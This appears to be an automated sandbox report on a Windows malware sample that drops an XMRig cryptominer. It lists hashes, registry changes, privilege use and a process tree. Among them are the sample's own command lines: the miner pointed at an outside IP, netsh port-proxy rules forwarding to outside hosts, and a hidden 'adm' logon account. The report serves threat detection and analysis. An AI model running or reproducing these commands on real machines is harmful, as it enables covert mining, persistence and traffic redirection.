Analysis
- Max time kernel: 148s
- Max time network: 151s
- Platform: windows10-2004_x64
- Resource: win10v2004-20220414-en
- Submitted: 18-05-2022 21:55

Tasks
- Static task: static1
- Behavioral task: behavioral1 (sample 298a18db753d40380aa41c3cdde1825c.exe, resource win7-20220414-en)
- Behavioral task: behavioral2 (sample 298a18db753d40380aa41c3cdde1825c.exe, resource win10v2004-20220414-en)
General
- Target: 298a18db753d40380aa41c3cdde1825c.exe
- Size: 397KB
- MD5: 298a18db753d40380aa41c3cdde1825c
- SHA1: a54eb952b7687bd8ad82c3934e3a3538547fb4a9
- SHA256: 4547b578ed4468731e348a47a16a26beeaf192c616b70d575f3a04328978a981
- SHA512: 3260d9c83dda85aebaf6f46d9c8e6dabaeec0bc03a85f8a1591aebc33c450a5943187282b1a0323eea949bceb00f866aced663c8b3433792173198e15558d4c7
Signatures
-
XMRig Miner Payload (3 IoCs)
Processes:
- resource C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe, yara_rule xmrig
- resource C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe, yara_rule xmrig
- resource C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe, yara_rule xmrig
Downloads MZ/PE file
-
Executes dropped EXE (2 IoCs)
Processes:
- PID 1272, $77_oracle.exe
- PID 4704, $77_oracle.exe
Sets file execution options in registry (2 TTPs)
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation, by 298a18db753d40380aa41c3cdde1825c.exe
Modifies WinLogon (2 TTPs, 3 IoCs)
Processes:
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, by 298a18db753d40380aa41c3cdde1825c.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts, by 298a18db753d40380aa41c3cdde1825c.exe
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0", by 298a18db753d40380aa41c3cdde1825c.exe
Modifies powershell logging option (1 TTP)
-
Drops file in Windows directory (2 IoCs)
Processes:
- File created: C:\Windows\SoftwareDistribution\config.xml, by 298a18db753d40380aa41c3cdde1825c.exe
- File opened for modification: C:\Windows\SoftwareDistribution\config.xml, by 298a18db753d40380aa41c3cdde1825c.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information (2 TTPs, 6 IoCs)
Uses commandline utility to view network configuration.
Processes:
- PID 4628, NETSTAT.EXE
- PID 2684, NETSTAT.EXE
- PID 1408, NETSTAT.EXE
- PID 220, NETSTAT.EXE
- PID 4524, NETSTAT.EXE
- PID 4276, NETSTAT.EXE
Suspicious behavior: EnumeratesProcesses (11 IoCs)
Processes:
- PID 2448, 298a18db753d40380aa41c3cdde1825c.exe (the same entry is reported 11 times)
Suspicious behavior: LoadsDriver (2 IoCs)
Processes:
- PID 648 (process name not recorded)
- PID 648 (process name not recorded)
Suspicious use of AdjustPrivilegeToken (12 IoCs)
Processes:
- Token: SeDebugPrivilege, PID 2448, 298a18db753d40380aa41c3cdde1825c.exe
- Token: SeSecurityPrivilege, PID 4444, msiexec.exe
- Token: SeDebugPrivilege, PID 1408, NETSTAT.EXE
- Token: SeDebugPrivilege, PID 220, NETSTAT.EXE
- Token: SeDebugPrivilege, PID 4524, NETSTAT.EXE
- Token: SeLockMemoryPrivilege, PID 1272, $77_oracle.exe
- Token: SeLockMemoryPrivilege, PID 1272, $77_oracle.exe
- Token: SeDebugPrivilege, PID 4276, NETSTAT.EXE
- Token: SeDebugPrivilege, PID 4628, NETSTAT.EXE
- Token: SeDebugPrivilege, PID 2684, NETSTAT.EXE
- Token: SeLockMemoryPrivilege, PID 4704, $77_oracle.exe
- Token: SeLockMemoryPrivilege, PID 4704, $77_oracle.exe
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
- PID 1272, $77_oracle.exe
- PID 4704, $77_oracle.exe
Suspicious use of WriteProcessMemory (40 IoCs)
Processes (each row below is reported twice in the report, 40 entries in total):
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 3656 (csc.exe)
- PID 3656 (csc.exe) wrote to memory of PID 4824 (cvtres.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 988 (chcp.com)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 3344 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 1408 (NETSTAT.EXE)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 220 (NETSTAT.EXE)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 4524 (NETSTAT.EXE)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 5056 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 2400 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 1632 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 3840 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 3740 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 1272 ($77_oracle.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 3084 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 4276 (NETSTAT.EXE)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 4628 (NETSTAT.EXE)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 2684 (NETSTAT.EXE)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 5092 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 3764 (netsh.exe)
- PID 2448 (298a18db753d40380aa41c3cdde1825c.exe) wrote to memory of PID 1888 (netsh.exe)
Processes
The bracketed number is the depth in the process tree (1 = top-level, 2 = child of the preceding level-1 process, 3 = grandchild); signatures triggered by each process are listed beneath its command line.

[1] "C:\Users\Admin\AppData\Local\Temp\298a18db753d40380aa41c3cdde1825c.exe"
    - Checks computer location settings
    - Modifies WinLogon
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [2] "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\db5j3cda.cmdline"
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8572.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8571.tmp"
    [2] "C:\Windows\system32\chcp.com" 437
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all
    [2] "C:\Windows\system32\NETSTAT.EXE" -na
        - Gathers network information
        - Suspicious use of AdjustPrivilegeToken
    [2] "C:\Windows\system32\NETSTAT.EXE" -na
        - Gathers network information
        - Suspicious use of AdjustPrivilegeToken
    [2] "C:\Windows\system32\NETSTAT.EXE" -na
        - Gathers network information
        - Suspicious use of AdjustPrivilegeToken
    [2] "C:\Windows\system32\netsh.exe" interface portproxy reset
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all
    [2] "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all
    [2] "C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 1
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all
    [2] "C:\Windows\system32\NETSTAT.EXE" -na
        - Gathers network information
        - Suspicious use of AdjustPrivilegeToken
    [2] "C:\Windows\system32\NETSTAT.EXE" -na
        - Gathers network information
        - Suspicious use of AdjustPrivilegeToken
    [2] "C:\Windows\system32\NETSTAT.EXE" -na
        - Gathers network information
        - Suspicious use of AdjustPrivilegeToken
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all
    [2] "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
    [2] "C:\Windows\system32\netsh.exe" interface portproxy show all

[1] C:\Windows\system32\msiexec.exe /V
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
Downloads

C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
- Filesize: 3.7MB
- MD5: 3b89f9f1e9932eee5a031b0266894f5f
- SHA1: c77b26bf58884507389cd1c5699174eec3459df2
- SHA256: 757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
- SHA512: 62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
C:\Users\Admin\AppData\Local\Temp\RES8572.tmp
- Filesize: 1KB
- MD5: b8a8c3ed50742ba9e2986506f9786e7a
- SHA1: c659430083bf8077500bfbbc02911cf13baa1a42
- SHA256: 69242ba264b943c8ee2941e76b1583eccbd8d114e4076510d8044588dcd4cf03
- SHA512: cdbcc6c5618b1c24083e6b72f8aa83d4a7cc773d305895dff4c36159410b6511a39a7e208d32c3246af49c628d1a14353981de42866a78a5039069ba4ab5571f

C:\Users\Admin\AppData\Local\Temp\config.json
- Filesize: 3KB
- MD5: 74fb175e205d74c162df04f8236ec94b
- SHA1: 57ccfe00ef11556ffa576c74eeecf3730659ae89
- SHA256: 1fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9
- SHA512: 8b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830

C:\Users\Admin\AppData\Local\Temp\db5j3cda.dll
- Filesize: 3KB
- MD5: e576ffe32b6c816cf1e6d419b6330a7a
- SHA1: 8d192377f0023a9c92e95f5afe63f7b157cccebf
- SHA256: cce6fe6cb48dfb4dbd1efd5e974447add4d7214d7814eaccc279172588a11a20
- SHA512: 37c276e26df52dfc524e93326b5b0f2a54e707c1bf0164bce7389ae04c396b6e491f051d162a5fb09bd237ad31f5dfcd2a228080259d0721a53baf242e45b126

C:\Users\Admin\AppData\Local\Temp\db5j3cda.pdb
- Filesize: 11KB
- MD5: 5c30403a478100bbd7cf042e8b29c537
- SHA1: da6b6c7fe921ed31f01fc428d95cd0f9acc97b8a
- SHA256: 6f01726fca75a7ec0c44c5c4b83c3c76b44de908b05678a49ed0a6381cbb1f33
- SHA512: 5c3f4ebceaed6e0420f0d2b4d218d58dd88526d0d29c1449f740d18309db091859f0b90bdac2b866724da44c3dbded3b116bfbd613725eb0e3c868bf0f677874

\??\c:\Users\Admin\AppData\Local\Temp\CSC8571.tmp
- Filesize: 652B
- MD5: eb5ce9ec4448dd5958f15780ab1429cc
- SHA1: 5bd5d38005e044f3b698753757912216ed06d3a4
- SHA256: 09cadbcd339f5e9153bef7c15493abc862edfbd8e102bb358ffeae9a59ac048d
- SHA512: b5f6b337cd06cf0abd70879d3975d7b64084875b79157944b32adb0774cb8fe6367bb89e2efa9df6f8ed4ba77125fdaad44aaf31195ae3007e0e9ec91cb87d67

\??\c:\Users\Admin\AppData\Local\Temp\db5j3cda.0.cs
- Filesize: 447B
- MD5: 1640a04633fee0dfdc7e22c4f4063bf6
- SHA1: 3cb525c47b5dd37f8ee45b034c9452265fba5476
- SHA256: 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
- SHA512: 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

\??\c:\Users\Admin\AppData\Local\Temp\db5j3cda.cmdline
- Filesize: 309B
- MD5: be263eaa8dd59d466f624a120eb13d30
- SHA1: 6bc7e84f6040e427cfdafcf62ca9eaa5bf5fe19f
- SHA256: 34dbd8e662d4719d9d8981b3edae779c30093bad149f79f2a2e6a250b1efd697
- SHA512: a49a4f2aa8e03aae00705b006162a4b48a85bb565551f4189eeba8507d5f0c608acb848096e6df6930954bf535e02eb1eab376fc9c11b42800d2a700ce9e8007